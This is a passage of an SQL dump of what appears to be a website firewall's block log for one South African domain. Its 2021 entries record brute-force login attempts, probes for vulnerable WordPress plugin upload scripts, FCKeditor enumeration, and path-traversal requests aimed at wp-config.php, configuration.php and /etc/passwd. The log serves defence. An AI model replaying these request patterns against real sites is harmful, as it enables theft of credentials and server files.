12:42:52','198.144.120.177','http://smithandsmith.co.za/wp-login.php','httpbl',''),(3922,'2021-05-26 14:24:23','107.189.10.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(3923,'2021-05-26 14:24:25','107.189.10.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(3924,'2021-05-26 14:24:28','107.189.10.42','https://smithandsmith.co.za/wp-login.php','404shield',''),(3925,'2021-05-26 15:46:47','156.146.58.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(3926,'2021-05-26 15:46:50','156.146.58.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(3927,'2021-05-26 15:46:53','156.146.58.134','https://smithandsmith.co.za/wp-login.php','404shield',''),(3928,'2021-05-26 17:13:34','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=showbiz_ajax_action&client_action=update_plugin','404shield',''),(3929,'2021-05-27 04:59:51','93.113.111.153','https://smithandsmith.co.za/wp-login.php','404shield',''),(3930,'2021-05-27 11:09:34','35.180.147.121','https://smithandsmith.co.za/wp-login.php','404shield',''),(3931,'2021-05-27 17:03:01','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css','404shield',''),(3932,'2021-05-27 18:37:49','206.189.231.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3933,'2021-05-27 19:02:12','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=showbiz_ajax_action&client_action=update_plugin','404shield',''),(3934,'2021-05-27 20:20:39','103.120.176.120','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3935,'2021-05-28 07:58:45','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/css/tinymce-shortcodes.css','404shield',''),(3936,'2021-05-28 17:13:30','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php','404shield',''),(3937,'2021-05-29 04:11:44','178.128.228.54','https://smithandsmith.co.za/wp-login.php','404shield',''),(3938,'2021-05-29 07:37:04','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=upload.php','404shield',''),(3939,'2021-05-29 10:29:53','164.68.126.176','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3940,'2021-05-29 18:09:34','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/page-flip-image-gallery/upload.php','404shield',''),(3941,'2021-05-30 05:55:47','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(3942,'2021-05-30 06:34:13','34.241.77.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(3943,'2021-05-30 12:22:51','139.162.47.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(3944,'2021-05-30 16:21:42','156.146.34.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(3945,'2021-05-30 16:21:46','156.146.34.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(3946,'2021-05-30 16:21:49','156.146.34.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(3947,'2021-05-30 17:54:47','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css','404shield',''),(3948,'2021-05-30 20:41:43','142.93.99.56','https://smithandsmith.co.za/wp-login.php','404shield',''),(3949,'2021-05-31 00:28:07','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3950,'2021-05-31 00:28:09','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3951,'2021-05-31 00:28:11','109.70.100.48','https://smithandsmith.co.za/wp-login.php','404shield',''),(3952,'2021-05-31 05:55:09','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin','404shield',''),(3953,'2021-05-31 18:40:58','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin','404shield',''),(3954,'2021-05-31 19:11:22','167.71.69.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(3955,'2021-05-31 19:11:22','167.71.69.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(3956,'2021-06-01 08:08:06','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin','404shield',''),(3957,'2021-06-01 17:18:28','198.144.120.177','https://www.smithandsmith.co.za/','httpbl',''),(3958,'2021-06-01 17:18:30','198.144.120.177','https://www.smithandsmith.co.za/','httpbl',''),(3959,'2021-06-01 17:34:03','35.181.87.238','https://smithandsmith.co.za/wp-login.php','404shield',''),(3960,'2021-06-01 17:45:42','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin','404shield',''),(3961,'2021-06-02 03:48:43','45.123.221.50','http://smithandsmith.co.za/administrator/','adminpw',''),(3962,'2021-06-02 03:48:47','45.123.221.50','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3963,'2021-06-02 03:48:52','45.123.221.50','https://smithandsmith.co.za/wp-login.php','404shield',''),(3964,'2021-06-02 03:49:02','185.220.100.247','http://smithandsmith.co.za/administrator/','adminpw',''),(3965,'2021-06-02 03:49:03','185.220.100.247','http://smithandsmith.co.za/','httpbl',''),(3966,'2021-06-02 03:49:04','185.220.100.247','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(3967,'2021-06-02 03:49:15','45.129.56.200','https://smithandsmith.co.za/wp-login.php','httpbl',''),(3968,'2021-06-02 03:49:17','185.220.100.252','http://smithandsmith.co.za/wp-admin/','httpbl',''),(3969,'2021-06-02 03:49:24','185.220.100.254','https://smithandsmith.co.za/admin.php','httpbl',''),(3970,'2021-06-02 06:26:34','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=update_plugin','404shield',''),(3971,'2021-06-02 09:21:56','148.72.232.159','https://smithandsmith.co.za/wp-login.php','404shield',''),(3972,'2021-06-02 18:46:29','23.228.109.147','https://smithandsmith.co.za/wp-content/uploads/2015/09/new_up.php','404shield',''),(3973,'2021-06-02 19:12:30','142.93.253.189','https://smithandsmith.co.za/wp-login.php','404shield',''),(3974,'2021-06-02 20:18:14','51.210.97.29','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3975,'2021-06-02 20:56:44','52.86.239.179','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(3976,'2021-06-02 20:56:57','52.86.239.179','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(3977,'2021-06-02 20:57:22','52.86.239.179','https://www.smithandsmith.co.za/wp-admin/install.php?step=1','404shield',''),(3978,'2021-06-03 00:58:09','171.25.193.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(3979,'2021-06-03 00:58:11','171.25.193.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(3980,'2021-06-03 00:58:14','171.25.193.78','https://smithandsmith.co.za/wp-login.php','404shield',''),(3981,'2021-06-03 07:04:29','23.228.109.147','https://smithandsmith.co.za/wp-content/uploads/2015/10/new_up.php','404shield',''),(3982,'2021-06-03 15:02:29','185.59.44.23','https://smithandsmith.co.za/wp-login.php','404shield',''),(3983,'2021-06-03 18:36:41','23.228.109.147','https://smithandsmith.co.za/wp-content/uploads/2015/11/new_up.php','404shield',''),(3984,'2021-06-03 18:44:05','5.188.210.4','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php','404shield',''),(3985,'2021-06-04 06:24:52','54.176.188.51','https://smithandsmith.co.za/wp-login.php','404shield',''),(3986,'2021-06-04 06:56:42','23.228.109.147','https://smithandsmith.co.za/wp-content/uploads/2015/12/new_up.php','404shield',''),(3987,'2021-06-04 12:18:55','5.188.210.4','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','404shield',''),(3988,'2021-06-04 18:30:06','23.228.109.147','https://smithandsmith.co.za/wp-content/themes/satoshi/style.css','404shield',''),(3989,'2021-06-05 07:19:04','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/mailcwp/mailcwp-upload.php','404shield',''),(3990,'2021-06-06 03:10:10','162.247.74.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(3991,'2021-06-06 03:10:13','162.247.74.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(3992,'2021-06-06 03:10:16','162.247.74.204','https://smithandsmith.co.za/wp-login.php','404shield',''),(3993,'2021-06-06 07:17:16','52.65.15.196','https://smithandsmith.co.za/wp-login.php','404shield',''),(3994,'2021-06-06 08:01:41','185.220.102.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(3995,'2021-06-06 08:01:43','185.220.102.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(3996,'2021-06-06 08:01:48','185.220.102.245','https://smithandsmith.co.za/wp-login.php','404shield',''),(3997,'2021-06-06 17:08:38','46.101.254.193','https://smithandsmith.co.za/wp-login.php','404shield',''),(3998,'2021-06-06 18:17:34','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','404shield',''),(3999,'2021-06-07 03:28:05','51.15.59.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(4000,'2021-06-07 03:28:08','51.15.59.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(4001,'2021-06-07 03:28:10','51.15.59.15','https://smithandsmith.co.za/wp-login.php','404shield',''),(4002,'2021-06-07 06:56:45','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/uploadify/readme.txt','404shield',''),(4003,'2021-06-07 17:49:10','45.156.184.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(4004,'2021-06-07 17:49:10','45.156.184.40','https://smithandsmith.co.za/wp-login.php','404shield',''),(4005,'2021-06-07 19:27:16','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/uploadify/includes/check.php','404shield',''),(4006,'2021-06-08 02:40:46','152.70.80.21','https://www.smithandsmith.co.za/wp-admin/install.php','404shield',''),(4007,'2021-06-08 07:47:50','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/CCSlider/includes/upload.php','404shield',''),(4008,'2021-06-08 08:23:06','135.125.46.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(4009,'2021-06-08 08:23:08','135.125.46.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(4010,'2021-06-08 08:23:10','135.125.46.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(4011,'2021-06-08 09:50:45','152.70.80.21','https://smithandsmith.co.za/wp-admin/install.php','404shield',''),(4012,'2021-06-08 19:41:00','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/readme.txt','404shield',''),(4013,'2021-06-09 00:42:14','80.88.88.149','https://smithandsmith.co.za/wp-login.php','404shield',''),(4014,'2021-06-09 00:42:15','80.88.88.149','https://smithandsmith.co.za/wp-login.php','404shield',''),(4015,'2021-06-09 06:36:48','117.208.155.220','http://smithandsmith.co.za/administrator/','adminpw',''),(4016,'2021-06-09 06:36:51','117.208.155.220','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4017,'2021-06-09 06:36:54','117.208.155.220','https://smithandsmith.co.za/wp-login.php','404shield',''),(4018,'2021-06-09 06:37:12','156.146.58.134','http://smithandsmith.co.za/administrator/','adminpw',''),(4019,'2021-06-09 06:37:13','156.146.58.134','http://smithandsmith.co.za/','httpbl',''),(4020,'2021-06-09 06:37:15','156.146.58.134','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(4021,'2021-06-09 06:37:33','212.21.66.6','https://smithandsmith.co.za/admin.php','httpbl',''),(4022,'2021-06-09 07:52:06','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','404shield',''),(4023,'2021-06-09 09:48:42','203.159.80.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(4024,'2021-06-09 09:48:45','203.159.80.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(4025,'2021-06-09 09:48:50','203.159.80.73','https://smithandsmith.co.za/wp-login.php','404shield',''),(4026,'2021-06-09 09:48:57','185.220.101.6','http://smithandsmith.co.za/wp-login.php','httpbl',''),(4027,'2021-06-09 09:49:00','185.220.101.6','http://smithandsmith.co.za/wp-login.php','httpbl',''),(4028,'2021-06-09 11:19:09','104.244.72.115','https://smithandsmith.co.za/wp-login.php','404shield',''),(4029,'2021-06-09 11:19:12','104.244.72.115','https://smithandsmith.co.za/wp-login.php','404shield',''),(4030,'2021-06-09 11:19:20','104.244.72.115','https://smithandsmith.co.za/wp-login.php','404shield',''),(4031,'2021-06-09 12:52:59','109.70.100.36','https://smithandsmith.co.za/wp-login.php','404shield',''),(4032,'2021-06-09 12:53:01','109.70.100.36','https://smithandsmith.co.za/wp-login.php','404shield',''),(4033,'2021-06-09 12:53:03','109.70.100.36','https://smithandsmith.co.za/wp-login.php','404shield',''),(4034,'2021-06-09 15:14:22','54.250.87.247','https://smithandsmith.co.za/wp-login.php','404shield',''),(4035,'2021-06-09 17:12:10','35.242.214.242','https://smithandsmith.co.za/wp-login.php','404shield',''),(4036,'2021-06-09 20:57:35','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php','404shield',''),(4037,'2021-06-09 23:49:04','5.188.210.4','http://smithandsmith.co.za/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4038,'2021-06-10 03:03:36','5.188.210.4','http://smithandsmith.co.za/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4039,'2021-06-10 04:46:55','109.70.100.44','https://smithandsmith.co.za/wp-login.php','404shield',''),(4040,'2021-06-10 04:46:57','109.70.100.44','https://smithandsmith.co.za/wp-login.php','404shield',''),(4041,'2021-06-10 04:46:59','109.70.100.44','https://smithandsmith.co.za/wp-login.php','404shield',''),(4042,'2021-06-10 13:43:34','5.188.210.4','http://smithandsmith.co.za/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4043,'2021-06-10 15:02:09','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php','404shield',''),(4044,'2021-06-10 17:51:50','5.188.210.4','http://smithandsmith.co.za/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4045,'2021-06-10 21:04:55','5.188.210.4','http://smithandsmith.co.za/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4046,'2021-06-11 00:26:42','5.188.210.4','http://smithandsmith.co.za/mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4047,'2021-06-11 02:14:08','142.44.246.226','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4048,'2021-06-11 04:04:08','5.188.210.4','http://smithandsmith.co.za/editor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4049,'2021-06-11 05:16:43','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/lbg-bottom-playlist-videoplayer/js/uploadify/uploadify.css','404shield',''),(4050,'2021-06-11 11:12:23','18.136.72.135','https://smithandsmith.co.za/wp-login.php','404shield',''),(4051,'2021-06-11 14:11:11','5.188.210.4','http://smithandsmith.co.za/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4052,'2021-06-11 17:23:41','5.188.210.4','http://smithandsmith.co.za/includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4053,'2021-06-11 18:19:16','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/mac-dock-gallery/readme.txt','404shield',''),(4054,'2021-06-11 21:26:38','5.188.210.4','http://smithandsmith.co.za/js/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4055,'2021-06-12 00:34:47','5.188.210.4','http://smithandsmith.co.za/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4056,'2021-06-12 05:57:10','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/contus-hd-flv-player/uploadVideo.php','404shield',''),(4057,'2021-06-12 11:41:57','210.212.250.39','https://smithandsmith.co.za/wp-login.php','404shield',''),(4058,'2021-06-12 13:56:10','5.188.210.4','http://smithandsmith.co.za/administrator/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4059,'2021-06-12 15:04:07','35.183.60.188','https://smithandsmith.co.za/wp-login.php','404shield',''),(4060,'2021-06-12 16:59:31','5.188.210.4','http://smithandsmith.co.za/administrator/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4061,'2021-06-12 18:07:39','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/contus-video-galleryversion-10/upload1.php','404shield',''),(4062,'2021-06-12 21:05:35','109.70.100.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(4063,'2021-06-12 21:05:38','109.70.100.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(4064,'2021-06-12 21:05:41','109.70.100.57','https://smithandsmith.co.za/wp-login.php','404shield',''),(4065,'2021-06-12 23:26:46','185.220.101.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4066,'2021-06-12 23:26:48','185.220.101.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4067,'2021-06-12 23:26:51','185.220.101.203','https://smithandsmith.co.za/wp-login.php','404shield',''),(4068,'2021-06-13 03:05:08','182.23.51.2','https://smithandsmith.co.za/wp-login.php','404shield',''),(4069,'2021-06-13 06:38:09','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css','404shield',''),(4070,'2021-06-13 07:45:51','109.70.100.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(4071,'2021-06-13 07:46:00','109.70.100.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(4072,'2021-06-13 07:46:03','109.70.100.59','https://smithandsmith.co.za/wp-login.php','404shield',''),(4073,'2021-06-13 10:15:29','157.230.164.216','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4074,'2021-06-13 17:51:38','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css','404shield',''),(4075,'2021-06-13 18:54:46','35.181.87.238','https://smithandsmith.co.za/wp-login.php','404shield',''),(4076,'2021-06-14 06:22:13','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php','404shield',''),(4077,'2021-06-14 13:44:34','5.188.210.4','https://smithandsmith.co.za/wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd','404shield',''),(4078,'2021-06-14 17:03:25','37.187.74.49','https://smithandsmith.co.za/wp-login.php','404shield',''),(4079,'2021-06-14 17:52:12','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/mm-forms/includes/doajaxfileupload.php','404shield',''),(4080,'2021-06-14 19:48:59','5.188.210.4','https://smithandsmith.co.za/wp-content/plugins/ioptimization/IOptimize.php?rchk','404shield',''),(4081,'2021-06-14 21:52:12','185.220.101.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(4082,'2021-06-14 21:52:14','185.220.101.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(4083,'2021-06-14 21:52:17','185.220.101.13','https://smithandsmith.co.za/wp-login.php','404shield',''),(4084,'2021-06-15 06:39:04','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/gallery-plugin/upload/php.php','404shield',''),(4085,'2021-06-15 07:10:22','18.236.151.253','http://smithandsmith.co.za/index.php?option=com_macgallery&view=download&albumid=../../configuration.php','dfishield',''),(4086,'2021-06-15 18:52:13','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/omni-secure-files/plupload/examples/upload.php','404shield',''),(4087,'2021-06-15 19:44:55','157.230.2.68','https://smithandsmith.co.za/wp-login.php','404shield',''),(4088,'2021-06-16 06:05:17','2.58.12.160','https://smithandsmith.co.za/wp-login.php','404shield',''),(4089,'2021-06-16 07:16:31','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wpstorecart/php/upload.php','404shield',''),(4090,'2021-06-16 08:20:59','18.194.196.202','https://smithandsmith.co.za/wp-login.php','404shield',''),(4091,'2021-06-16 14:04:09','89.163.222.77','https://smithandsmith.co.za/wp-login.php','404shield',''),(4092,'2021-06-16 15:55:08','92.118.77.10','https://smithandsmith.co.za/contact','httpbl',''),(4093,'2021-06-16 15:55:08','92.118.77.10','https://smithandsmith.co.za/','httpbl',''),(4094,'2021-06-16 15:55:09','92.118.77.10','https://smithandsmith.co.za/','httpbl',''),(4095,'2021-06-16 19:02:44','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css','404shield',''),(4096,'2021-06-16 19:56:24','167.99.248.142','https://smithandsmith.co.za/wp-login.php','404shield',''),(4097,'2021-06-17 05:37:54','2.58.12.160','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4098,'2021-06-17 07:17:09','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/videowhisper-video-presentation/vp/translation.php','404shield',''),(4099,'2021-06-17 19:05:10','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/uploader/uploadify/uploadify.css','404shield',''),(4100,'2021-06-18 06:34:47','34.230.156.67','https://smithandsmith.co.za/wp-login.php','404shield',''),(4101,'2021-06-18 07:46:39','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/poka-module/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg','404shield',''),(4102,'2021-06-18 13:26:14','52.42.79.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(4103,'2021-06-18 15:30:06','72.167.222.102','https://smithandsmith.co.za/wp-login.php','404shield',''),(4104,'2021-06-19 00:50:34','136.226.33.115','http://smithandsmith.co.za/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&Itemid=1','dfishield',''),(4105,'2021-06-20 03:10:00','136.226.33.115','http://smithandsmith.co.za/jojo/index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1','dfishield',''),(4106,'2021-06-20 05:45:35','34.251.241.226','https://smithandsmith.co.za/wp-login.php','404shield',''),(4107,'2021-06-20 05:46:34','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/ajaxupload.js','404shield',''),(4108,'2021-06-20 16:13:35','18.229.73.207','https://smithandsmith.co.za/wp-login.php','404shield',''),(4109,'2021-06-20 18:10:30','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=_ning_upload_image','404shield',''),(4110,'2021-06-21 03:17:16','188.166.214.213','https://smithandsmith.co.za/wp-login.php','404shield',''),(4111,'2021-06-21 08:10:20','23.228.109.147','https://smithandsmith.co.za/wp-admin/admin-ajax.php?action=_ning_upload_image','404shield',''),(4112,'2021-06-21 14:14:38','37.49.230.208','http://www.smithandsmith.co.za/','muashield',''),(4113,'2021-06-21 14:14:39','37.49.230.208','http://www.smithandsmith.co.za//','muashield',''),(4114,'2021-06-21 14:14:41','37.49.230.208','http://www.smithandsmith.co.za//index.php/component/users','sessionshield',''),(4115,'2021-06-21 18:23:00','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/nmedia-user-file-uploader/nm_fileuploader_style.css','404shield',''),(4116,'2021-06-21 20:45:28','36.67.101.26','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4117,'2021-06-21 20:47:01','193.56.255.196','http://www.smithandsmith.co.za/','muashield',''),(4118,'2021-06-21 20:47:03','193.56.255.196','http://www.smithandsmith.co.za/','muashield',''),(4119,'2021-06-21 20:47:12','193.56.255.196','http://www.smithandsmith.co.za/index.php/component/users','sessionshield',''),(4120,'2021-06-22 06:19:40','142.44.224.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4121,'2021-06-22 06:19:40','142.44.224.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4122,'2021-06-22 06:41:46','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/nmedia-user-file-uploader-pro-v7.4-HTML5/nm_fileuploader_style.css','404shield',''),(4123,'2021-06-22 10:00:13','62.151.182.240','https://smithandsmith.co.za/wp-login.php','404shield',''),(4124,'2021-06-22 17:42:26','46.101.95.65','https://smithandsmith.co.za/wp-login.php','404shield',''),(4125,'2021-06-22 19:06:32','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php','404shield',''),(4126,'2021-06-23 06:52:59','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/pica-photo-gallery/css/style.css','404shield',''),(4127,'2021-06-23 07:28:45','82.165.187.17','https://smithandsmith.co.za/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','404shield',''),(4128,'2021-06-23 07:29:10','82.165.187.17','https://smithandsmith.co.za/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','404shield',''),(4129,'2021-06-23 18:53:28','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/videowhisper-video-conference-integration/vc/flash_detect_min.js','404shield',''),(4130,'2021-06-23 22:19:56','159.203.176.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(4131,'2021-06-23 22:19:56','159.203.176.82','https://smithandsmith.co.za/wp-login.php','404shield',''),(4132,'2021-06-24 07:10:29','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/videowhisper-video-conference-integration/vc/vw_upload.php','404shield',''),(4133,'2021-06-24 15:00:52','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4134,'2021-06-24 15:00:52','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4135,'2021-06-24 15:00:52','176.113.115.10','https://smithandsmith.co.za/wp-login.php','404shield',''),(4136,'2021-06-24 18:54:38','164.68.126.176','https://smithandsmith.co.za/wp-login.php','404shield',''),(4137,'2021-06-24 19:10:36','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/image-symlinks/uploadify/uploadify.css','404shield',''),(4138,'2021-06-24 20:10:10','159.65.128.164','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4139,'2021-06-25 06:48:15','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/dzs-zoomsounds/admin/upload.php','404shield',''),(4140,'2021-06-25 18:21:03','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/1-flash-gallery/readme.txt','404shield',''),(4141,'2021-06-26 06:10:03','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php?file=tf2rghf.jpg','404shield',''),(4142,'2021-06-26 10:06:09','5.188.210.4','http://smithandsmith.co.za/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4143,'2021-06-26 13:42:19','5.188.210.4','http://smithandsmith.co.za/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4144,'2021-06-26 14:39:30','103.247.141.199','https://smithandsmith.co.za/wp-login.php','404shield',''),(4145,'2021-06-26 17:40:48','5.188.210.4','http://smithandsmith.co.za/js/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4146,'2021-06-26 18:00:42','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-mailinglist/css/colorbox.css','404shield',''),(4147,'2021-06-27 05:20:59','5.188.210.4','http://smithandsmith.co.za/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4148,'2021-06-27 06:11:44','23.228.109.147','https://smithandsmith.co.za/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php','404shield',''),(4149,'2021-06-27 07:10:31','199.195.253.208','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(4150,'2021-06-27 15:54:58','5.188.210.4','http://smithandsmith.co.za/editor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','dfishield',''),(4151,'2021-06-27 17:28:53','52.66.82.69','https://smithandsmith.co.za/wp-login.php','404shield',''),(4152,'2021-06-27 22:46:08','188.213.28.175','https://www.smithandsmith.co.za/wp-login.php','404shield',''),(4153,'2021-06-28 17:43:06','45.151.248.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(4154,'2021-06-28 17:43:06','45.151.248.94','https://smithandsmith.co.za/wp-login.php','404shield',''),(4155,'2021-06-28 20:11:02','217.160.195.176','https://www.smithandsmith.co.za/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','404shield',''),(4156,'2021-06-28 